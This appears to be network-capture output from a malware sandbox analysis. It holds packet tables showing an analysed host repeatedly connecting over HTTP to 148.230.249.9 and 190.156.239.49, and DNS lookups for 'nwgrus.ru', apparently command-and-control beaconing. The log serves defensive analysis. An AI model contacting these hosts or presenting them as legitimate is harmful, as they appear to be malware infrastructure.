                                      Oct 13, 2024 18:28:15.835700989 CEST8065105148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:15.836549997 CEST8065115148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:15.836635113 CEST6511580192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:15.840307951 CEST6511580192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:15.840347052 CEST6511580192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:15.845371008 CEST8065115148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:15.845386028 CEST8065115148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:16.790606976 CEST8065115148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:16.790745974 CEST8065115148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:16.790815115 CEST6511580192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:16.790896893 CEST6511580192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:16.795906067 CEST8065115148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:16.798844099 CEST6512280192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:16.803783894 CEST8065122148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:16.803915977 CEST6512280192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:16.804027081 CEST6512280192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:16.804059982 CEST6512280192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:16.809787035 CEST8065122148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:16.809815884 CEST8065122148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:17.753078938 CEST8065122148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:17.753123045 CEST8065122148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:17.753341913 CEST6512280192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:17.762639999 CEST6512280192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:17.767564058 CEST8065122148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:17.806852102 CEST6512880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:17.812514067 CEST8065128148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:17.812601089 CEST6512880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:17.812771082 CEST6512880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:17.812810898 CEST6512880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:17.817683935 CEST8065128148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:17.817768097 CEST8065128148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:18.774601936 CEST8065128148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:18.775686979 CEST8065128148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:18.775757074 CEST6512880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:18.775999069 CEST6512880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:18.778984070 CEST6513480192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:18.780981064 CEST8065128148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:18.784069061 CEST8065134148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:18.784166098 CEST6513480192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:18.784312963 CEST6513480192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:18.784347057 CEST6513480192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:18.789195061 CEST8065134148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:18.789247990 CEST8065134148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:19.727567911 CEST8065134148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:19.728682041 CEST8065134148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:19.728904009 CEST6513480192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:19.729233027 CEST6513480192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:19.734323978 CEST8065134148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:19.734853029 CEST6514080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:19.739847898 CEST8065140148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:19.739960909 CEST6514080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:19.740135908 CEST6514080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:19.740176916 CEST6514080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:19.744988918 CEST8065140148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:19.745142937 CEST8065140148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:20.703269005 CEST8065140148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:20.704267979 CEST8065140148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:28:20.704700947 CEST6514080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:20.709239960 CEST6514080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:28:20.714406967 CEST8065140148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:25.650063038 CEST6527080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:25.655219078 CEST8065270148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:25.655355930 CEST6527080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:25.655539989 CEST6527080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:25.655575037 CEST6527080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:25.660574913 CEST8065270148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:25.660605907 CEST8065270148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:26.607275963 CEST8065270148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:26.607450962 CEST8065270148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:26.607711077 CEST6527080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:26.610852957 CEST6527080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:26.615865946 CEST8065270148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:27.826234102 CEST6527180192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:27.831506014 CEST8065271148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:27.831624985 CEST6527180192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:27.831768036 CEST6527180192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:27.831768990 CEST6527180192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:27.836638927 CEST8065271148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:27.836807013 CEST8065271148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:28.770073891 CEST8065271148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:28.771136045 CEST8065271148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:28.771259069 CEST6527180192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:28.771318913 CEST6527180192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:28.776321888 CEST8065271148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:29.086436033 CEST6527280192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:29.091653109 CEST8065272148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:29.091912031 CEST6527280192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:29.091999054 CEST6527280192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:29.092036963 CEST6527280192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:29.097230911 CEST8065272148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:29.097259998 CEST8065272148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:30.032151937 CEST8065272148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:30.033135891 CEST8065272148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:30.033310890 CEST6527280192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:30.059278011 CEST6527280192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:30.064582109 CEST8065272148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:30.597359896 CEST6527380192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:30.603868961 CEST8065273148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:30.603980064 CEST6527380192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:30.604149103 CEST6527380192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:30.604204893 CEST6527380192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:30.609294891 CEST8065273148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:30.609323978 CEST8065273148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:31.548640966 CEST8065273148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:31.548719883 CEST8065273148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:31.548788071 CEST6527380192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:31.548968077 CEST6527380192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:31.554034948 CEST8065273148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:31.759579897 CEST6527480192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:31.764739990 CEST8065274148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:31.764832020 CEST6527480192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:31.764997005 CEST6527480192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:31.765028000 CEST6527480192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:31.769836903 CEST8065274148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:31.769892931 CEST8065274148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:32.705795050 CEST8065274148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:32.705883026 CEST8065274148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:32.705945015 CEST6527480192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:32.706151009 CEST6527480192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:32.711270094 CEST8065274148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:37.420042038 CEST6527580192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:37.425733089 CEST8065275148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:37.426176071 CEST6527580192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:37.426177025 CEST6527580192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:37.426275969 CEST6527580192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:37.431365967 CEST8065275148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:37.431417942 CEST8065275148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:38.369604111 CEST8065275148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:38.369868994 CEST8065275148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:38.370062113 CEST6527580192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:38.374594927 CEST6527580192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:38.379633904 CEST8065275148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:42.453030109 CEST6527680192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:42.458642006 CEST8065276148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:42.459079981 CEST6527680192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:42.459172010 CEST6527680192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:42.459172010 CEST6527680192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:42.464067936 CEST8065276148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:42.464165926 CEST8065276148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:43.415448904 CEST8065276148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:43.415518999 CEST8065276148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:43.415783882 CEST6527680192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:43.422976017 CEST6527680192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:43.427985907 CEST8065276148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:47.519145966 CEST6527780192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:47.524502993 CEST8065277148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:47.524744987 CEST6527780192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:47.524832010 CEST6527780192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:47.524864912 CEST6527780192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:47.529989958 CEST8065277148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:47.530004025 CEST8065277148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:48.485850096 CEST8065277148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:48.487097979 CEST8065277148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:48.487283945 CEST6527780192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:48.487400055 CEST6527780192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:48.492595911 CEST8065277148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:52.678787947 CEST6527880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:52.684046984 CEST8065278148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:52.684268951 CEST6527880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:52.684465885 CEST6527880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:52.684540987 CEST6527880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:52.689568043 CEST8065278148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:52.689577103 CEST8065278148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:53.627422094 CEST8065278148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:53.628232002 CEST8065278148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:53.628328085 CEST6527880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:53.630148888 CEST6527880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:53.635132074 CEST8065278148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:58.712245941 CEST6527980192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:58.718581915 CEST8065279148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:58.718908072 CEST6527980192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:58.718908072 CEST6527980192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:58.718909025 CEST6527980192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:58.724266052 CEST8065279148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:58.724297047 CEST8065279148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:59.680485964 CEST8065279148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:59.682029963 CEST8065279148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:29:59.682272911 CEST6527980192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:59.685296059 CEST6527980192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:29:59.690716982 CEST8065279148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:30:05.138192892 CEST6528080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:30:05.143424034 CEST8065280148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:30:05.143526077 CEST6528080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:30:05.143635035 CEST6528080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:30:05.143667936 CEST6528080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:30:05.148509979 CEST8065280148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:30:05.148673058 CEST8065280148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:30:06.085484028 CEST8065280148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:30:06.086147070 CEST8065280148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:30:06.086267948 CEST6528080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:30:06.086997032 CEST6528080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:30:06.091850996 CEST8065280148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:30:11.310967922 CEST6528180192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:30:11.316101074 CEST8065281148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:30:11.316200972 CEST6528180192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:30:11.316328049 CEST6528180192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:30:11.316346884 CEST6528180192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:30:11.321192026 CEST8065281148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:30:11.321223021 CEST8065281148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:30:12.261116028 CEST8065281148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:30:12.261282921 CEST8065281148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:30:12.261434078 CEST6528180192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:30:12.263565063 CEST6528180192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:30:12.268507957 CEST8065281148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:30:20.010098934 CEST6528280192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:20.015103102 CEST8065282190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:20.015494108 CEST6528280192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:20.015578032 CEST6528280192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:20.015578032 CEST6528280192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:20.020554066 CEST8065282190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:20.020781994 CEST8065282190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:21.478468895 CEST8065282190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:21.478521109 CEST8065282190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:21.478549957 CEST8065282190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:21.478584051 CEST8065282190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:21.478641033 CEST6528280192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:21.478641987 CEST6528280192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:21.478907108 CEST6528280192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:21.483680964 CEST8065282190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:26.123940945 CEST6528380192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:26.129339933 CEST8065283190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:26.129496098 CEST6528380192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:26.129671097 CEST6528380192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:26.129710913 CEST6528380192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:26.134785891 CEST8065283190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:26.134815931 CEST8065283190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:27.201457977 CEST8065283190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:27.201617002 CEST8065283190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:27.201694012 CEST6528380192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:27.209893942 CEST6528380192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:27.215029955 CEST8065283190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:32.347740889 CEST6528480192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:32.353072882 CEST8065284190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:32.353173971 CEST6528480192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:32.353360891 CEST6528480192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:32.353400946 CEST6528480192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:32.358455896 CEST8065284190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:32.358616114 CEST8065284190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:33.412847996 CEST8065284190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:33.412944078 CEST8065284190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:33.413089037 CEST6528480192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:33.414274931 CEST6528480192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:33.419094086 CEST8065284190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:38.902930975 CEST6528580192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:38.908217907 CEST8065285190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:38.908505917 CEST6528580192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:38.908505917 CEST6528580192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:38.908505917 CEST6528580192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:38.913501024 CEST8065285190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:38.913532019 CEST8065285190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:39.981079102 CEST8065285190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:39.987359047 CEST8065285190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:39.987751007 CEST6528580192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:39.987751961 CEST6528580192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:39.992949963 CEST8065285190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:44.553365946 CEST6528680192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:44.558906078 CEST8065286190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:44.559143066 CEST6528680192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:44.559293985 CEST6528680192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:44.559294939 CEST6528680192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:44.564346075 CEST8065286190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:44.564374924 CEST8065286190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:45.632917881 CEST8065286190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:45.632966995 CEST8065286190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:45.633160114 CEST6528680192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:45.633161068 CEST6528680192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:45.638246059 CEST8065286190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:50.964096069 CEST6528780192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:50.969412088 CEST8065287190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:50.969518900 CEST6528780192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:50.969672918 CEST6528780192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:50.969698906 CEST6528780192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:50.974596024 CEST8065287190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:50.974745989 CEST8065287190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:52.041395903 CEST8065287190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:52.041446924 CEST8065287190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:52.041560888 CEST6528780192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:52.041975021 CEST6528780192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:52.048170090 CEST8065287190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:56.473633051 CEST6528880192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:56.478847980 CEST8065288190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:56.479007006 CEST6528880192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:56.479343891 CEST6528880192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:56.479343891 CEST6528880192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:56.484225988 CEST8065288190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:56.484360933 CEST8065288190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:57.539180040 CEST8065288190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:57.539336920 CEST8065288190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:30:57.539699078 CEST6528880192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:57.539700031 CEST6528880192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:30:57.544656038 CEST8065288190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:31:03.435033083 CEST6528980192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:31:03.440574884 CEST8065289190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:31:03.440665007 CEST6528980192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:31:03.440818071 CEST6528980192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:31:03.440851927 CEST6528980192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:31:03.445816040 CEST8065289190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:31:03.445915937 CEST8065289190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:31:04.500907898 CEST8065289190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:31:04.509406090 CEST8065289190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:31:04.509515047 CEST6528980192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:31:04.509599924 CEST6528980192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:31:04.514774084 CEST8065289190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:31:09.030992985 CEST6529080192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:31:09.036115885 CEST8065290190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:31:09.036257982 CEST6529080192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:31:09.036417961 CEST6529080192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:31:09.036448956 CEST6529080192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:31:09.041256905 CEST8065290190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:31:09.041536093 CEST8065290190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:31:10.096421957 CEST8065290190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:31:10.096517086 CEST8065290190.156.239.49192.168.2.4
                                      Oct 13, 2024 18:31:10.096613884 CEST6529080192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:31:10.096738100 CEST6529080192.168.2.4190.156.239.49
                                      Oct 13, 2024 18:31:10.101636887 CEST8065290190.156.239.49192.168.2.4
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 13, 2024 18:27:28.655493021 CEST53648621.1.1.1192.168.2.4
                                      Oct 13, 2024 18:27:41.999279022 CEST6173453192.168.2.41.1.1.1
                                      Oct 13, 2024 18:27:43.007685900 CEST6173453192.168.2.41.1.1.1
                                      Oct 13, 2024 18:27:44.048820972 CEST6173453192.168.2.41.1.1.1
                                      Oct 13, 2024 18:27:44.320143938 CEST53617341.1.1.1192.168.2.4
                                      Oct 13, 2024 18:27:44.320195913 CEST53617341.1.1.1192.168.2.4
                                      Oct 13, 2024 18:27:44.320225954 CEST53617341.1.1.1192.168.2.4
                                      Oct 13, 2024 18:30:17.703927040 CEST6338453192.168.2.41.1.1.1
                                      Oct 13, 2024 18:30:18.713279009 CEST6338453192.168.2.41.1.1.1
                                      Oct 13, 2024 18:30:19.713051081 CEST6338453192.168.2.41.1.1.1
                                      Oct 13, 2024 18:30:20.008795977 CEST53633841.1.1.1192.168.2.4
                                      Oct 13, 2024 18:30:20.008842945 CEST53633841.1.1.1192.168.2.4
                                      Oct 13, 2024 18:30:20.008871078 CEST53633841.1.1.1192.168.2.4
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Oct 13, 2024 18:27:41.999279022 CEST192.168.2.41.1.1.10x43c9Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:43.007685900 CEST192.168.2.41.1.1.10x43c9Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:27:44.048820972 CEST192.168.2.41.1.1.10x43c9Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:17.703927040 CEST192.168.2.41.1.1.10x3f9Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:18.713279009 CEST192.168.2.41.1.1.10x3f9Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                      Oct 13, 2024 18:30:19.713051081 CEST192.168.2.41.1.1.10x3f9Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
